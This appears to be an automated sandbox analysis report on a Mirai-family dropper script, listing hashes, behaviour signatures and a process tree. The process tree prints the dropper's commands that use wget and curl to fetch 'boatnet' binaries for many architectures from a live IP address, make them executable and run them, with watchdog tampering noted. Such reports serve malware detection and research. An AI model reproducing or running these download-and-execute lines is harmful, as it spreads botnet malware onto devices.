Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24-12-2024 02:55
Static task
static1
Behavioral task
behavioral1
Sample
288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh
-
Size
3KB
-
MD5
e0ccd217979419469e913cbef10872f3
-
SHA1
6bbef022dcf450af81bee90522e4c82069c84064
-
SHA256
288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71
-
SHA512
38402719e384396071ab1f779eb0d67a55570ecfb04018e47cafdfd73ce04984e15c0d2942b446cee5652a449e22a8690812dbe5fd232736cb8a3939531255ce
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 903 chmod 912 chmod 789 chmod 831 chmod 775 chmod 847 chmod 918 chmod 924 chmod 930 chmod 781 chmod 889 chmod 865 chmod 897 chmod 765 chmod 806 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 767 WTF /tmp/WTF 776 WTF /tmp/WTF 782 WTF /tmp/WTF 790 WTF /tmp/WTF 807 WTF /tmp/WTF 833 WTF /tmp/WTF 848 WTF /tmp/WTF 866 WTF /tmp/WTF 890 WTF /tmp/WTF 898 WTF /tmp/WTF 907 WTF /tmp/WTF 913 WTF /tmp/WTF 919 WTF /tmp/WTF 925 WTF /tmp/WTF 931 WTF -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF -
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral4/files/fstream-1.dat upx behavioral4/files/fstream-4.dat upx -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/689/cmdline WTF File opened for reading /proc/731/cmdline WTF File opened for reading /proc/736/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/717/cmdline WTF File opened for reading /proc/739/cmdline WTF File opened for reading /proc/928/cmdline WTF File opened for reading /proc/685/cmdline WTF File opened for reading /proc/738/cmdline WTF File opened for reading /proc/851/cmdline WTF File opened for reading /proc/893/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/916/cmdline WTF File opened for reading /proc/922/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/901/cmdline WTF File opened for reading /proc/915/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/682/cmdline WTF File opened for reading /proc/745/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/451/cmdline WTF File opened for reading /proc/688/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/737/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/898/cmdline WTF -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 770 wget 773 curl 774 cat -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/boatnet.m68k curl File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.sh4 wget File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arm7 curl File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/WTF 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.sh4 curl
Processes
-
/tmp/288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh/tmp/288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh1⤵
- Writes file to tmp directory
PID:739 -
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:742
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/catcat boatnet.x862⤵PID:763
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.x86 systemd-private-e5b9b304f2894ebf8d631ea3fbf94439-systemd-timedated.service-evTVzz WTF2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:767
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:770
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:773
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
PID:774
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.mips boatnet.x86 systemd-private-e5b9b304f2894ebf8d631ea3fbf94439-systemd-timedated.service-evTVzz WTF2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:776
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:778
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/catcat boatnet.arc2⤵PID:780
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.arc boatnet.mips boatnet.x86 systemd-private-e5b9b304f2894ebf8d631ea3fbf94439-systemd-timedated.service-evTVzz WTF2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:782
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.i4682⤵PID:784
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/catcat boatnet.i4682⤵PID:788
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 systemd-private-e5b9b304f2894ebf8d631ea3fbf94439-systemd-timedated.service-evTVzz WTF2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:790
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.i6862⤵PID:792
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:798
-
-
/bin/catcat boatnet.i6862⤵PID:805
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 systemd-private-e5b9b304f2894ebf8d631ea3fbf94439-systemd-timedated.service-evTVzz WTF2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:807
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.x86_642⤵PID:809
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/catcat boatnet.x86_642⤵PID:829
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 systemd-private-e5b9b304f2894ebf8d631ea3fbf94439-systemd-timedated.service-evTVzz WTF2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:833
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:836
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/catcat boatnet.mpsl2⤵PID:846
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 systemd-private-e5b9b304f2894ebf8d631ea3fbf94439-systemd-timedated.service-evTVzz WTF2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:848
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:852
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/catcat boatnet.arm2⤵PID:864
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 systemd-private-e5b9b304f2894ebf8d631ea3fbf94439-systemd-timedated.service-evTVzz WTF2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:866
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:870
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/catcat boatnet.arm52⤵PID:887
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 systemd-private-e5b9b304f2894ebf8d631ea3fbf94439-systemd-timedated.service-evTVzz WTF2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:890
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:893
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/catcat boatnet.arm62⤵PID:896
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 systemd-private-e5b9b304f2894ebf8d631ea3fbf94439-systemd-timedated.service-evTVzz WTF2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:898
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:900
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/catcat boatnet.arm72⤵PID:902
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 systemd-private-e5b9b304f2894ebf8d631ea3fbf94439-systemd-timedated.service-evTVzz WTF2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:907
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:909
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/catcat boatnet.ppc2⤵PID:911
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:913
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:915
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/catcat boatnet.spc2⤵PID:917
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:919
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:921
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/catcat boatnet.m68k2⤵PID:923
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:925
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:927
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/catcat boatnet.sh42⤵PID:929
-
-
/bin/chmodchmod +x 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:931
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD5366837c461677cb1b37924604fe50564
SHA1ce442f4c57322b7dbafcaebd37cb0ee531d0ea4d
SHA256c28510d75f73788f786fb0e5f14f3b7d6e349e0eeaa5922c6743be66824b4c4f
SHA5124434b96a2931b0bbf39863cecd0c924e64e8d051b9277ae7a86ed151d60bdebfaf2f7b749ec6cad8a41000a3acb268adaea9f42868f5617a52f8053efad79840
-
Filesize
105KB
MD597a63a655202fc4ceb0f4a4957711dd4
SHA1ea5a84a5b260cacd1107e9bc05351ec52895e938
SHA2566d13de91a88aac152d7aeffedecc20414ed86d1c6cc58b5cc2bc7a439c57f620
SHA512d5463c0d4274bd6de9ea25d5ebd99afce000b2e3afad63099176ba49a7c80972244b259b3b438277acb997d3b612e52f5eaa998da2db0ea87daddd3e203b0a89
-
Filesize
232B
MD57dfb9a4219d20c6babc4877451844e3c
SHA18b56a18d01c00f757df29faeb95b2711ecd3cd18
SHA2569177a352dcbf8875ebb2e22e682760d47faa4d77398add153dd7084e7568c5bc
SHA5127355451c27cd2fe7e03af772a8911fff879e64b04c8e002d4335ff890957a04e611e444131ddab6e171e0a21a72cbbe75f9b5cc338a72d2d24ec6d71d59998c9
-
Filesize
57KB
MD5549940fef5478737eae8c25bcfed0952
SHA1bc44d8bf8282eddc6df04beb5d1d3dac465371db
SHA256e2409e6b5b2b1769f1f4eca9ee84024a59145cdcf7bf7893fcc83095f1bbfced
SHA5123f8a2d29f312e3ce30a1491b83f2a70c8bfe67b752b6e490ea8f6d129f15ad3847eaffcdffca4238d5171b0b1f6d2eaf2cc21ed8fc5b2b2f016c98407a349e08
-
Filesize
20KB
MD5cfdee595514f89c9e1ca4c3c26837bb6
SHA1726f957189f0ce2da9008987aaa7f51453ede884
SHA2564940c3107a34d4b65f81e5e5e7a54f31fce9417fe74d18dd6e6b104d07197a3d
SHA51207cd565d04eeef92d3bf0613413d2c63bc045d6093bb048118b3f80254701c9aaef7dac444dc39ced7c2297754d7dbe1da4f808a6e2e87727f9272b436fea226